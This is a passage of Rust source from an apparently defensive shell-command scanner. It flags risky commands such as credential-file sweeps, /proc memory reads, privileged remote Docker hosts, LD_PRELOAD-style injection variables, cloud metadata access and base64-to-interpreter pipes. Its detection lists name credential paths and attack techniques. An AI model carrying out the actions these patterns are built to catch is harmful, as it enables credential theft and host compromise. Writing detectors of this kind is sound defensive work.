1140                evidence: vec![Evidence::CommandPattern {
1141                    pattern: "redirect to dotfile".to_string(),
1142                    matched: redact::redact_shell_assignments(raw),
1143                }],
1144                human_view: None,
1145                agent_view: None,
1146                mitre_id: None,
1147                custom_rule_id: None,
1148            });
1149        }
1150    }
1151}
1152
1153fn check_archive_extract(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1154    for segment in segments {
1155        if let Some(ref cmd) = segment.command {
1156            let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1157            if cmd_base == "tar" || cmd_base == "unzip" || cmd_base == "7z" {
1158                // Check if extracting to a sensitive directory
1159                let raw = &segment.raw;
1160                let sensitive_targets = [
1161                    "-C /",
1162                    "-C ~/",
1163                    "-C $HOME/",
1164                    "-d /",
1165                    "-d ~/",
1166                    "-d $HOME/",
1167                    "> ~/.",
1168                    ">> ~/.",
1169                ];
1170                for target in &sensitive_targets {
1171                    if raw.contains(target) {
1172                        findings.push(Finding {
1173                            rule_id: RuleId::ArchiveExtract,
1174                            severity: Severity::Medium,
1175                            title: "Archive extraction to sensitive path".to_string(),
1176                            description: format!(
1177                                "Archive command '{cmd_base}' extracts to a potentially sensitive location"
1178                            ),
1179                            evidence: vec![Evidence::CommandPattern {
1180                                pattern: "archive extract".to_string(),
1181                                matched: redact::redact_shell_assignments(raw),
1182                            }],
1183                            human_view: None,
1184                            agent_view: None,
1185                mitre_id: None,
1186                custom_rule_id: None,
1187                        });
1188                        return;
1189                    }
1190                }
1191            }
1192        }
1193    }
1194}
1195
1196// ---------------------------------------------------------------------------
1197// Process memory access detection
1198// ---------------------------------------------------------------------------
1199
1200/// Commands that read file contents — scoped to utilities commonly used
1201/// for proc memory dumping. Excludes echo/printf (not file readers).
1202const PROC_MEM_READER_CMDS: &[&str] = &[
1203    "cat", "dd", "strings", "head", "tail", "xxd", "od", "base64", "hexdump", "less", "more", "cp",
1204    "grep",
1205];
1206
1207static PROC_MEM_RE: Lazy<Regex> =
1208    Lazy::new(|| Regex::new(r"/proc/(?:self|\d+)/mem\b").expect("PROC_MEM_RE"));
1209
1210fn check_proc_mem_access(
1211    segments: &[tokenize::Segment],
1212    shell: ShellType,
1213    findings: &mut Vec<Finding>,
1214) {
1215    for seg in segments {
1216        let effective_seg =
1217            unwrap_env_split_string_segment(seg, shell).unwrap_or_else(|| seg.clone());
1218        let resolved_cmd = resolve_base_through_wrappers(&effective_seg, shell);
1219        if !PROC_MEM_READER_CMDS.contains(&resolved_cmd.as_str()) {
1220            continue;
1221        }
1222
1223        for arg in &effective_seg.args {
1224            let normalized = normalize_shell_token(arg, shell);
1225            if PROC_MEM_RE.is_match(&normalized) {
1226                findings.push(Finding {
1227                    rule_id: RuleId::ProcMemAccess,
1228                    severity: Severity::High,
1229                    title: "Process memory access detected".to_string(),
1230                    description: "Command reads from /proc/*/mem, which can dump process memory \
1231                                  contents including secrets and credentials"
1232                        .to_string(),
1233                    evidence: vec![Evidence::CommandPattern {
1234                        pattern: "proc memory read".to_string(),
1235                        matched: redact::redact_shell_assignments(&seg.raw),
1236                    }],
1237                    human_view: None,
1238                    agent_view: None,
1239                    mitre_id: None,
1240                    custom_rule_id: None,
1241                });
1242                return;
1243            }
1244            // dd-style: if=/proc/self/mem
1245            if let Some(val) = normalized.strip_prefix("if=") {
1246                if PROC_MEM_RE.is_match(val) {
1247                    findings.push(Finding {
1248                        rule_id: RuleId::ProcMemAccess,
1249                        severity: Severity::High,
1250                        title: "Process memory access detected".to_string(),
1251                        description: "Command reads from /proc/*/mem via dd, which can dump \
1252                                      process memory contents including secrets and credentials"
1253                            .to_string(),
1254                        evidence: vec![Evidence::CommandPattern {
1255                            pattern: "proc memory read".to_string(),
1256                            matched: redact::redact_shell_assignments(&seg.raw),
1257                        }],
1258                        human_view: None,
1259                        agent_view: None,
1260                        mitre_id: None,
1261                        custom_rule_id: None,
1262                    });
1263                    return;
1264                }
1265            }
1266        }
1267    }
1268}
1269
1270// ---------------------------------------------------------------------------
1271// Docker remote privilege escalation detection
1272// ---------------------------------------------------------------------------
1273
1274fn check_docker_remote_privesc(
1275    segments: &[tokenize::Segment],
1276    shell: ShellType,
1277    findings: &mut Vec<Finding>,
1278) {
1279    for seg in segments {
1280        let effective_seg =
1281            unwrap_env_split_string_segment(seg, shell).unwrap_or_else(|| seg.clone());
1282        let resolved_cmd = resolve_base_through_wrappers(&effective_seg, shell);
1283        if resolved_cmd != "docker" && resolved_cmd != "podman" {
1284            continue;
1285        }
1286
1287        let norm_args: Vec<String> = effective_seg
1288            .args
1289            .iter()
1290            .map(|a| normalize_shell_token(a, shell))
1291            .collect();
1292
1293        let has_remote = detect_docker_remote_host(&norm_args, &effective_seg, shell);
1294        if !has_remote {
1295            continue;
1296        }
1297
1298        let has_priv = norm_args.iter().any(|a| a == "--privileged");
1299        let has_root_mount = has_docker_root_mount(&norm_args);
1300
1301        if has_priv || has_root_mount {
1302            findings.push(Finding {
1303                rule_id: RuleId::DockerRemotePrivEsc,
1304                severity: Severity::Critical,
1305                title: "Docker remote privileged escalation detected".to_string(),
1306                description: "Command targets a remote Docker daemon with privileged access or \
1307                              host root mount, enabling full host compromise"
1308                    .to_string(),
1309                evidence: vec![Evidence::CommandPattern {
1310                    pattern: "docker remote privesc".to_string(),
1311                    matched: redact::redact_shell_assignments(&seg.raw),
1312                }],
1313                human_view: None,
1314                agent_view: None,
1315                mitre_id: None,
1316                custom_rule_id: None,
1317            });
1318            return;
1319        }
1320    }
1321}
1322
1323fn detect_docker_remote_host(
1324    norm_args: &[String],
1325    seg: &tokenize::Segment,
1326    shell: ShellType,
1327) -> bool {
1328    for (i, arg) in norm_args.iter().enumerate() {
1329        let lower = arg.to_lowercase();
1330        // -H=tcp://... or --host=tcp://... (combined form, quotes already stripped)
1331        if arg.starts_with("-H=tcp://") || lower.starts_with("--host=tcp://") {
1332            return true;
1333        }
1334        // -H tcp://... or --host tcp://... (flag + next arg)
1335        if arg == "-H" || lower == "--host" {
1336            if let Some(next) = norm_args.get(i + 1) {
1337                if next.starts_with("tcp://") {
1338                    return true;
1339                }
1340            }
1341        }
1342    }
1343    // DOCKER_HOST=tcp://... as env prefix (Path A: direct leading env assignment)
1344    for (name, value) in tokenize::leading_env_assignments(&seg.raw) {
1345        if name.eq_ignore_ascii_case("DOCKER_HOST") {
1346            let clean_val = normalize_shell_token(&value, shell);
1347            if clean_val.starts_with("tcp://") {
1348                return true;
1349            }
1350        }
1351    }
1352    // Path B: env wrapper form (env DOCKER_HOST=tcp://... docker ...)
1353    // Skip DOCKER_HOST= args that follow -e/--env (those set container env, not client remote)
1354    let args = &seg.args;
1355    for (i, arg) in args.iter().enumerate() {
1356        let norm = normalize_shell_token(arg, shell);
1357        if let Some(val) = norm
1358            .strip_prefix("DOCKER_HOST=")
1359            .or_else(|| norm.strip_prefix("docker_host="))
1360        {
1361            // Check if this arg is a container -e/--env value (not client config)
1362            if i > 0 {
1363                let prev = normalize_shell_token(&args[i - 1], shell);
1364                let prev_lower = prev.to_lowercase();
1365                if prev_lower == "-e" || prev_lower == "--env" {
1366                    continue; // container env, not client remote
1367                }
1368            }
1369            let clean_val = normalize_shell_token(val, shell);
1370            if clean_val.starts_with("tcp://") {
1371                return true;
1372            }
1373        }
1374    }
1375    false
1376}
1377
1378fn has_docker_root_mount(norm_args: &[String]) -> bool {
1379    for (i, arg) in norm_args.iter().enumerate() {
1380        let lower = arg.to_lowercase();
1381        // -v /:/... or --volume /:/... (flag + next value)
1382        if lower == "-v" || lower == "--volume" {
1383            if let Some(val) = norm_args.get(i + 1) {
1384                if val.starts_with("/:/") {
1385                    return true;
1386                }
1387            }
1388        }
1389        // -v=/:/... or --volume=/:/...
1390        if lower.starts_with("-v=/:/") || lower.starts_with("--volume=/:/") {
1391            return true;
1392        }
1393        // --mount type=bind,src=/,dst=/...
1394        let mount_val = if lower == "--mount" {
1395            norm_args.get(i + 1).map(|s| s.as_str())
1396        } else {
1397            lower.strip_prefix("--mount=")
1398        };
1399        if let Some(mv) = mount_val {
1400            if mv.contains("src=/,")
1401                || mv.contains("source=/,")
1402                || mv.ends_with("src=/")
1403                || mv.ends_with("source=/")
1404            {
1405                return true;
1406            }
1407        }
1408    }
1409    false
1410}
1411
1412// ---------------------------------------------------------------------------
1413// Credential file sweep detection
1414// ---------------------------------------------------------------------------
1415
1416const CREDENTIAL_PATHS: &[&str] = &[
1417    "/.ssh/id_",
1418    "/.ssh/authorized_keys",
1419    "/.aws/credentials",
1420    "/.aws/config",
1421    "/.docker/config.json",
1422    "/.kube/config",
1423    "/.config/gcloud/",
1424    "/.npmrc",
1425    "/.pypirc",
1426    "/.netrc",
1427    "/.gnupg/",
1428    "/.config/gh/",
1429    "/.git-credentials",
1430];
1431
1432const READ_ARCHIVE_VERBS: &[&str] = &[
1433    "cat", "tar", "zip", "gzip", "strings", "head", "tail", "base64", "xxd", "dd", "cp", "find",
1434    "xargs",
1435];
1436
1437fn check_credential_file_sweep(
1438    segments: &[tokenize::Segment],
1439    shell: ShellType,
1440    context: ScanContext,
1441    findings: &mut Vec<Finding>,
1442) {
1443    if context != ScanContext::Exec {
1444        return;
1445    }
1446
1447    for seg in segments {
1448        let effective_seg =
1449            unwrap_env_split_string_segment(seg, shell).unwrap_or_else(|| seg.clone());
1450        let resolved_cmd = resolve_base_through_wrappers(&effective_seg, shell);
1451        if !READ_ARCHIVE_VERBS.contains(&resolved_cmd.as_str()) {
1452            continue;
1453        }
1454
1455        let norm_args: Vec<String> = effective_seg
1456            .args
1457            .iter()
1458            .map(|a| normalize_shell_token(a, shell))
1459            .collect();
1460        let seg_text = norm_args.join(" ");
1461        let matched_count = CREDENTIAL_PATHS
1462            .iter()
1463            .filter(|p| seg_text.contains(**p))
1464            .count();
1465
1466        if matched_count >= 2 {
1467            findings.push(Finding {
1468                rule_id: RuleId::CredentialFileSweep,
1469                severity: Severity::Medium,
1470                title: "Multiple credential files accessed".to_string(),
1471                description: format!(
1472                    "Command accesses {matched_count} known credential file paths in a single \
1473                     invocation, which may indicate credential harvesting"
1474                ),
1475                evidence: vec![Evidence::CommandPattern {
1476                    pattern: "credential file sweep".to_string(),
1477                    matched: redact::redact_shell_assignments(&seg.raw),
1478                }],
1479                human_view: None,
1480                agent_view: None,
1481                mitre_id: None,
1482                custom_rule_id: None,
1483            });
1484            return;
1485        }
1486    }
1487}
1488
1489// ---------------------------------------------------------------------------
1490// Phase 8: Dangerous environment variable detection
1491// ---------------------------------------------------------------------------
1492
1493/// Environment variables that enable arbitrary code injection via dynamic linker.
1494const CODE_INJECTION_VARS: &[&str] = &[
1495    "LD_PRELOAD",
1496    "LD_LIBRARY_PATH",
1497    "LD_AUDIT",
1498    "DYLD_INSERT_LIBRARIES",
1499    "DYLD_LIBRARY_PATH",
1500];
1501
1502/// Environment variables that cause arbitrary script execution at shell startup.
1503const SHELL_INJECTION_VARS: &[&str] = &["BASH_ENV", "ENV", "PROMPT_COMMAND"];
1504
1505/// Environment variables that hijack interpreter module/library search paths.
1506const INTERPRETER_HIJACK_VARS: &[&str] = &["PYTHONPATH", "NODE_OPTIONS", "RUBYLIB", "PERL5LIB"];
1507
1508/// Sensitive credential variable names that should not be exported in commands.
1509use super::shared::SENSITIVE_KEY_VARS;
1510
1511fn classify_env_var(name: &str) -> Option<(RuleId, Severity, &'static str, &'static str)> {
1512    let name_upper = name.to_ascii_uppercase();
1513    let name = name_upper.as_str();
1514    if CODE_INJECTION_VARS.contains(&name) {
1515        Some((
1516            RuleId::CodeInjectionEnv,
1517            Severity::Critical,
1518            "Code injection environment variable",
1519            "can inject shared libraries into all processes, enabling arbitrary code execution",
1520        ))
1521    } else if SHELL_INJECTION_VARS.contains(&name) {
1522        Some((
1523            RuleId::ShellInjectionEnv,
1524            Severity::Critical,
1525            "Shell injection environment variable",
1526            "can cause arbitrary script execution at shell startup",
1527        ))
1528    } else if INTERPRETER_HIJACK_VARS.contains(&name) {
1529        Some((
1530            RuleId::InterpreterHijackEnv,
1531            Severity::High,
1532            "Interpreter hijack environment variable",
1533            "can hijack the interpreter's module/library search path",
1534        ))
1535    } else if SENSITIVE_KEY_VARS.contains(&name) {
1536        Some((
1537            RuleId::SensitiveEnvExport,
1538            Severity::High,
1539            "Sensitive credential exported",
1540            "exposes a sensitive credential that may be logged in shell history",
1541        ))
1542    } else {
1543        None
1544    }
1545}
1546
1547/// Cargo global flags that consume the next token as a value.
1548const CARGO_VALUE_FLAGS: &[&str] = &[
1549    "-Z",
1550    "-C",
1551    "--config",
1552    "--manifest-path",
1553    "--color",
1554    "--target-dir",
1555    "--target",
1556];
1557
1558/// Find the cargo subcommand (first positional arg), skipping flags and toolchain specs.
1559/// Returns true if the subcommand is `install` or `add`.
1560fn is_cargo_install_or_add(args: &[String]) -> bool {
1561    let mut skip_next = false;
1562    for arg in args {
1563        if skip_next {
1564            skip_next = false;
1565            continue;
1566        }
1567        // Toolchain specs (+nightly, +stable)
1568        if arg.starts_with('+') {
1569            continue;
1570        }
1571        // Long flags with = (--config=foo): skip this arg only
1572        if arg.starts_with("--") && arg.contains('=') {
1573            continue;
1574        }
1575        // Known value-taking flags: skip this AND next
1576        if CARGO_VALUE_FLAGS.contains(&arg.as_str()) {
1577            skip_next = true;
1578            continue;
1579        }
1580        // Other flags (--locked, -v, etc.)
1581        if arg.starts_with('-') {
1582            continue;
1583        }
1584        // First positional arg is the subcommand — only match install/add
1585        return arg == "install" || arg == "add";
1586    }
1587    false
1588}
1589
1590/// Warn when `cargo install/add` is used and no supply-chain audit directory exists.
1591fn check_vet_not_configured(
1592    segments: &[tokenize::Segment],
1593    cwd: Option<&str>,
1594    findings: &mut Vec<Finding>,
1595) {
1596    let is_cargo_install = segments.iter().any(|s| {
1597        if let Some(ref cmd) = s.command {
1598            let base = cmd
1599                .rsplit(['/', '\\'])
1600                .next()
1601                .unwrap_or(cmd)
1602                .to_ascii_lowercase();
1603            let base = base.strip_suffix(".exe").unwrap_or(&base);
1604            if base == "cargo" {
1605                return is_cargo_install_or_add(&s.args);
1606            }
1607        }
1608        false
1609    });
1610    if !is_cargo_install {
1611        return;
1612    }
1613
1614    // Check if supply-chain/ config exists relative to the analysis context cwd.
1615    // Require an explicit cwd — without one we cannot reliably check the filesystem.
1616    let cwd = match cwd {
1617        Some(dir) => dir,
1618        None => return,
1619    };
1620    let check_path = std::path::PathBuf::from(cwd).join("supply-chain/config.toml");
1621    if check_path.exists() {
1622        return;
1623    }
1624
1625    findings.push(Finding {
1626        rule_id: RuleId::VetNotConfigured,
1627        severity: Severity::Low,
1628        title: "No supply-chain audit configured".into(),
1629        description: "Consider running `cargo vet init` to enable dependency auditing.".into(),
1630        evidence: vec![],
1631        human_view: None,
1632        agent_view: None,
1633        mitre_id: None,
1634        custom_rule_id: None,
1635    });
1636}
1637
1638fn check_env_var_in_command(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1639    for segment in segments {
1640        let Some(ref cmd) = segment.command else {
1641            continue;
1642        };
1643        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1644
1645        match cmd_base.as_str() {
1646            "export" => {
1647                for arg in &segment.args {
1648                    if let Some((var_name, value)) = arg.split_once('=') {
1649                        emit_env_finding(var_name.trim(), value, findings);
1650                    }
1651                }
1652            }
1653            "env" => {
1654                for arg in &segment.args {
1655                    let trimmed = arg.trim();
1656                    if trimmed.starts_with('-') {
1657                        continue;
1658                    }
1659                    if let Some((var_name, value)) = trimmed.split_once('=') {
1660                        emit_env_finding(var_name.trim(), value, findings);
1661                    }
1662                }
1663            }
1664            "set" => {
1665                // Fish shell: set [-gx] VAR_NAME value...
1666                let mut var_name: Option<&str> = None;
1667                let mut value_parts: Vec<&str> = Vec::new();
1668                for arg in &segment.args {
1669                    let trimmed = arg.trim();
1670                    if trimmed.starts_with('-') && var_name.is_none() {
1671                        continue;
1672                    }
1673                    if var_name.is_none() {
1674                        var_name = Some(trimmed);
1675                    } else {
1676                        value_parts.push(trimmed);
1677                    }
1678                }
1679                if let Some(name) = var_name {
1680                    emit_env_finding(name, &value_parts.join(" "), findings);
1681                }
1682            }
1683            _ => {}
1684        }
1685    }
1686}
1687
1688fn emit_env_finding(var_name: &str, value: &str, findings: &mut Vec<Finding>) {
1689    let Some((rule_id, severity, title_prefix, desc_suffix)) = classify_env_var(var_name) else {
1690        return;
1691    };
1692    let value_preview = redact_env_value(value);
1693    findings.push(Finding {
1694        rule_id,
1695        severity,
1696        title: format!("{title_prefix}: {var_name}"),
1697        description: format!("Setting {var_name} {desc_suffix}"),
1698        evidence: vec![Evidence::EnvVar {
1699            name: var_name.to_string(),
1700            value_preview,
1701        }],
1702        human_view: None,
1703        agent_view: None,
1704        mitre_id: None,
1705        custom_rule_id: None,
1706    });
1707}
1708
1709fn redact_env_value(val: &str) -> String {
1710    if val.is_empty() {
1711        String::new()
1712    } else {
1713        "[REDACTED]".to_string()
1714    }
1715}
1716
1717// ---------------------------------------------------------------------------
1718// Phase 9 (free): Network destination detection
1719// ---------------------------------------------------------------------------
1720
1721/// Cloud metadata endpoint IPs that expose instance credentials.
1722const METADATA_ENDPOINTS: &[&str] = &["169.254.169.254", "100.100.100.200"];
1723
1724fn check_host_for_network_issues(arg: &str, findings: &mut Vec<Finding>) {
1725    if let Some(host) = extract_host_from_arg(arg) {
1726        if METADATA_ENDPOINTS.contains(&host.as_str()) {
1727            findings.push(Finding {
1728                rule_id: RuleId::MetadataEndpoint,
1729                severity: Severity::Critical,
1730                title: format!("Cloud metadata endpoint access: {host}"),
1731                description: format!(
1732                    "Command accesses cloud metadata endpoint {host}, \
1733                     which can expose instance credentials and sensitive configuration"
1734                ),
1735                evidence: vec![Evidence::Url {
1736                    raw: arg.to_string(),
1737                }],
1738                human_view: None,
1739                agent_view: None,
1740                mitre_id: None,
1741                custom_rule_id: None,
1742            });
1743        } else if is_private_ip(&host) {
1744            findings.push(Finding {
1745                rule_id: RuleId::PrivateNetworkAccess,
1746                severity: Severity::High,
1747                title: format!("Private network access: {host}"),
1748                description: format!(
1749                    "Command accesses private network address {host}, \
1750                     which may indicate SSRF or lateral movement"
1751                ),
1752                evidence: vec![Evidence::Url {
1753                    raw: arg.to_string(),
1754                }],
1755                human_view: None,
1756                agent_view: None,
1757                mitre_id: None,
1758                custom_rule_id: None,
1759            });
1760        }
1761    }
1762}
1763
1764fn check_network_destination(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1765    for segment in segments {
1766        let Some(ref cmd) = segment.command else {
1767            continue;
1768        };
1769        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1770        if !is_source_command(&cmd_base) {
1771            continue;
1772        }
1773
1774        for arg in &segment.args {
1775            let trimmed = arg.trim().trim_matches(|c: char| c == '\'' || c == '"');
1776            if trimmed.starts_with('-') {
1777                // Check flag=value args for embedded URLs (e.g., --url=http://evil.com)
1778                if let Some((_flag, value)) = trimmed.split_once('=') {
1779                    check_host_for_network_issues(value, findings);
1780                }
1781                continue;
1782            }
1783
1784            check_host_for_network_issues(trimmed, findings);
1785        }
1786    }
1787}
1788
1789/// Extract a host/IP from a URL-like command argument.
1790fn extract_host_from_arg(arg: &str) -> Option<String> {
1791    // URL with scheme: http://HOST[:PORT]/path
1792    if let Some(scheme_end) = arg.find("://") {
1793        let after_scheme = &arg[scheme_end + 3..];
1794        // Strip userinfo (anything before @)
1795        let after_userinfo = if let Some(at_idx) = after_scheme.find('@') {
1796            &after_scheme[at_idx + 1..]
1797        } else {
1798            after_scheme
1799        };
1800        // Get host:port (before first /)
1801        let host_port = after_userinfo.split('/').next().unwrap_or(after_userinfo);
1802        let host = strip_port(host_port);
1803        // Reject obviously invalid hosts (malformed brackets, embedded paths)
1804        if host.is_empty() || host.contains('/') || host.contains('[') {
1805            return None;
1806        }
1807        return Some(host);
1808    }
1809
1810    // Bare host/IP: "169.254.169.254/path" or just "169.254.169.254"
1811    let host_part = arg.split('/').next().unwrap_or(arg);
1812    let host = strip_port(host_part);
1813
1814    // Accept valid IPv4 addresses for bare hosts (no scheme)
1815    if host.parse::<std::net::Ipv4Addr>().is_ok() {
1816        return Some(host);
1817    }
1818
1819    // Accept bracketed IPv6: [::1]
1820    if host_part.starts_with('[') {
1821        if let Some(bracket_end) = host_part.find(']') {
1822            let ipv6 = &host_part[1..bracket_end];
1823            if ipv6.parse::<std::net::Ipv6Addr>().is_ok() {
1824                return Some(ipv6.to_string());
1825            }
1826        }
1827    }
1828
1829    None
1830}
1831
1832/// Strip port number from a host:port string, handling IPv6 brackets.
1833fn strip_port(host_port: &str) -> String {
1834    // Handle IPv6: [::1]:8080
1835    if host_port.starts_with('[') {
1836        if let Some(bracket_end) = host_port.find(']') {
1837            return host_port[1..bracket_end].to_string();
1838        }
1839    }
1840    // Don't strip from unbracketed IPv6 (multiple colons)
1841    let colon_count = host_port.chars().filter(|&c| c == ':').count();
1842    if colon_count > 1 {
1843        return host_port.to_string(); // IPv6, don't strip
1844    }
1845    // IPv4 or hostname with single colon: strip trailing :PORT
1846    if let Some(colon_idx) = host_port.rfind(':') {
1847        if host_port[colon_idx + 1..].parse::<u16>().is_ok() {
1848            return host_port[..colon_idx].to_string();
1849        }
1850    }
1851    host_port.to_string()
1852}
1853
1854/// Check if an IPv4 address is in a private/reserved range (excluding loopback).
1855fn is_private_ip(host: &str) -> bool {
1856    if let Ok(ip) = host.parse::<std::net::Ipv4Addr>() {
1857        let octets = ip.octets();
1858        // Loopback (127.x) is excluded — local traffic has no SSRF/lateral movement risk.
1859        if octets[0] == 127 {
1860            return false;
1861        }
1862        return octets[0] == 10
1863            || (octets[0] == 172 && (16..=31).contains(&octets[1]))
1864            || (octets[0] == 192 && octets[1] == 168);
1865    }
1866    false
1867}
1868
1869/// POSIX fetch commands — appropriate for both `tirith run` and `vet` hints.
1870const POSIX_FETCH_COMMANDS: &[&str] = &["curl", "wget", "http", "https", "xh", "fetch"];
1871
1872/// PowerShell fetch commands — appropriate for `vet` hints only
1873/// (`tirith run` doesn't support PowerShell interpreter flows).
1874const POWERSHELL_FETCH_COMMANDS: &[&str] =
1875    &["iwr", "irm", "invoke-webrequest", "invoke-restmethod"];
1876
1877/// Source commands that are not URL-fetching (no vet/tirith-run hints).
1878const NON_FETCH_SOURCE_COMMANDS: &[&str] = &["scp", "rsync"];
1879
1880fn is_source_command(cmd: &str) -> bool {
1881    POSIX_FETCH_COMMANDS.contains(&cmd)
1882        || POWERSHELL_FETCH_COMMANDS.contains(&cmd)
1883        || NON_FETCH_SOURCE_COMMANDS.contains(&cmd)
1884}
1885
1886/// All URL-fetching commands (union of POSIX + PowerShell).
1887fn is_url_fetch_command(cmd: &str) -> bool {
1888    POSIX_FETCH_COMMANDS.contains(&cmd) || POWERSHELL_FETCH_COMMANDS.contains(&cmd)
1889}
1890
1891/// Whether this fetch source supports `tirith run` hints.
1892/// True only for POSIX fetch commands (`tirith run` is a shell-script runner).
1893fn supports_tirith_run_hint(cmd: &str) -> bool {
1894    POSIX_FETCH_COMMANDS.contains(&cmd)
1895}
1896
1897/// Check if string starts with http:// or https:// (case-insensitive scheme).
1898fn starts_with_http_scheme(s: &str) -> bool {
1899    let b = s.as_bytes();
1900    (b.len() >= 8 && b[..8].eq_ignore_ascii_case(b"https://"))
1901        || (b.len() >= 7 && b[..7].eq_ignore_ascii_case(b"http://"))
1902}
1903
1904/// Strip control characters (0x00–0x1F, 0x7F) from a URL so it cannot inject
1905/// ANSI escapes, newlines, or other terminal-interpreted sequences into the
1906/// finding description displayed to the user.
1907fn sanitize_url_for_display(url: &str) -> String {
1908    url.chars().filter(|&c| !c.is_ascii_control()).collect()
1909}
1910
1911/// Extract all URLs from command arguments.
1912fn extract_urls_from_args(args: &[String], shell: ShellType) -> Vec<String> {
1913    let mut urls = Vec::new();
1914    for arg in args {
1915        let normalized = normalize_shell_token(arg.trim(), shell);
1916
1917        if starts_with_http_scheme(&normalized) {
1918            urls.push(normalized);
1919            continue;
1920        }
1921
1922        // Check --flag=<url> forms (e.g., --url=https://...)
1923        if let Some((_, val)) = normalized.split_once('=') {
1924            if starts_with_http_scheme(val) {
1925                urls.push(val.to_string());
1926            }
1927        }
1928    }
1929    urls
1930}
1931
1932/// Check command destination hosts against policy network deny/allow lists.
1933///
1934/// For each source command (curl, wget, etc.), extracts the destination host and
1935/// checks against deny/allow lists. Allow takes precedence (exempts from deny).
1936pub fn check_network_policy(
1937    input: &str,
1938    shell: ShellType,
1939    deny: &[String],
1940    allow: &[String],
1941) -> Vec<Finding> {
1942    if deny.is_empty() {
1943        return Vec::new();
1944    }
1945
1946    let segments = tokenize::tokenize(input, shell);
1947    let mut findings = Vec::new();
1948
1949    for segment in &segments {
1950        let Some(ref cmd) = segment.command else {
1951            continue;
1952        };
1953        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1954        if !is_source_command(&cmd_base) {
1955            continue;
1956        }
1957
1958        for arg in &segment.args {
1959            let trimmed = arg.trim().trim_matches(|c: char| c == '\'' || c == '"');
1960            if trimmed.starts_with('-') {
1961                // Check flag=value args for embedded URLs (e.g., --url=http://evil.com)
1962                if let Some((_flag, value)) = trimmed.split_once('=') {
1963                    if let Some(host) = extract_host_from_arg(value) {
1964                        if matches_network_list(&host, allow) {
1965                            continue;
1966                        }
1967                        if matches_network_list(&host, deny) {
1968                            findings.push(Finding {
1969                                rule_id: RuleId::CommandNetworkDeny,
1970                                severity: Severity::Critical,
1971                                title: format!("Network destination denied by policy: {host}"),
1972                                description: format!(
1973                                    "Command accesses {host}, which is on the network deny list"
1974                                ),
1975                                evidence: vec![Evidence::Url {
1976                                    raw: value.to_string(),
1977                                }],
1978                                human_view: None,
1979                                agent_view: None,
1980                                mitre_id: None,
1981                                custom_rule_id: None,
1982                            });
1983                            continue;
1984                        }
1985                    }
1986                }
1987                continue;
1988            }
1989
1990            if let Some(host) = extract_host_from_arg(trimmed) {
1991                // Allow list exempts from deny
1992                if matches_network_list(&host, allow) {
1993                    continue;
1994                }
1995                if matches_network_list(&host, deny) {
1996                    findings.push(Finding {
1997                        rule_id: RuleId::CommandNetworkDeny,
1998                        severity: Severity::Critical,
1999                        title: format!("Network destination denied by policy: {host}"),
2000                        description: format!(
2001                            "Command accesses {host}, which is on the network deny list"
2002                        ),
2003                        evidence: vec![Evidence::Url {
2004                            raw: trimmed.to_string(),
2005                        }],
2006                        human_view: None,
2007                        agent_view: None,
2008                        mitre_id: None,
2009                        custom_rule_id: None,
2010                    });
2011                    return findings;
2012                }
2013            }
2014        }
2015    }
2016
2017    findings
2018}
2019
2020/// Check if a host matches any entry in a network list.
2021///
2022/// Supports exact hostname match, suffix match (`.example.com` matches
2023/// `sub.example.com`), and CIDR match for IPv4 addresses.
2024fn matches_network_list(host: &str, list: &[String]) -> bool {
2025    for entry in list {
2026        // CIDR match: "10.0.0.0/8"
2027        if entry.contains('/') {
2028            if let Some(matched) = cidr_contains(host, entry) {
2029                if matched {
2030                    return true;
2031                }
2032                continue;
2033            }
2034        }
2035
2036        // Exact match
2037        if host.eq_ignore_ascii_case(entry) {
2038            return true;
2039        }
2040
2041        // Suffix match: entry "example.com" matches "sub.example.com"
2042        if host.len() > entry.len()
2043            && host.ends_with(entry.as_str())
2044            && host.as_bytes()[host.len() - entry.len() - 1] == b'.'
2045        {
2046            return true;
2047        }
2048    }
2049    false
2050}
2051
2052/// Check if an IPv4 address is within a CIDR range.
2053/// Returns `Some(true/false)` if both parse, `None` if either fails.
2054fn cidr_contains(host: &str, cidr: &str) -> Option<bool> {
2055    let parts: Vec<&str> = cidr.splitn(2, '/').collect();
2056    if parts.len() != 2 {
2057        return None;
2058    }
2059    let network: std::net::Ipv4Addr = parts[0].parse().ok()?;
2060    let prefix_len: u32 = parts[1].parse().ok()?;
2061    if prefix_len > 32 {
2062        return None;
2063    }
2064    let host_ip: std::net::Ipv4Addr = host.parse().ok()?;
2065
2066    let mask = if prefix_len == 0 {
2067        0u32
2068    } else {
2069        !0u32 << (32 - prefix_len)
2070    };
2071    let net_bits = u32::from(network) & mask;
2072    let host_bits = u32::from(host_ip) & mask;
2073
2074    Some(net_bits == host_bits)
2075}
2076
2077// ---------------------------------------------------------------------------
2078// Base64 decode-execute detection
2079// ---------------------------------------------------------------------------
2080
2081fn check_base64_decode_execute(
2082    segments: &[tokenize::Segment],
2083    shell: ShellType,
2084    findings: &mut Vec<Finding>,
2085) {
2086    // Pattern A: Pipe chain — base64 with decode flag piped to interpreter
2087    for (i, seg) in segments.iter().enumerate() {
2088        if let Some(ref cmd) = seg.command {
2089            let cmd_base = normalize_cmd_base(cmd, shell);
2090            if cmd_base == "base64" {
2091                let has_decode_flag = seg.args.iter().any(|arg| {
2092                    let norm = normalize_shell_token(arg, shell);
2093                    matches!(norm.as_str(), "-d" | "--decode" | "-D")
2094                });
2095                if has_decode_flag {
2096                    // Check if next piped segment is an interpreter
2097                    if let Some(next_seg) = segments.get(i + 1) {
2098                        if let Some(ref sep) = next_seg.preceding_separator {
2099                            if (sep == "|" || sep == "|&")
2100                                && resolve_interpreter_name(next_seg, shell).is_some()
2101                            {
2102                                findings.push(Finding {
2103                                    rule_id: RuleId::Base64DecodeExecute,
2104                                    severity: Severity::High,
2105                                    title: "Base64 decode piped to interpreter".to_string(),
2106                                    description: "Command decodes base64 content and pipes it directly to an interpreter for execution".to_string(),
2107                                    evidence: vec![Evidence::CommandPattern {
2108                                        pattern: "base64 decode | interpreter".to_string(),
2109                                        matched: redact::redact_shell_assignments(&format!(
2110                                            "{} | {}", seg.raw, next_seg.raw
2111                                        )),
2112                                    }],
2113                                    human_view: None,
2114                                    agent_view: None,
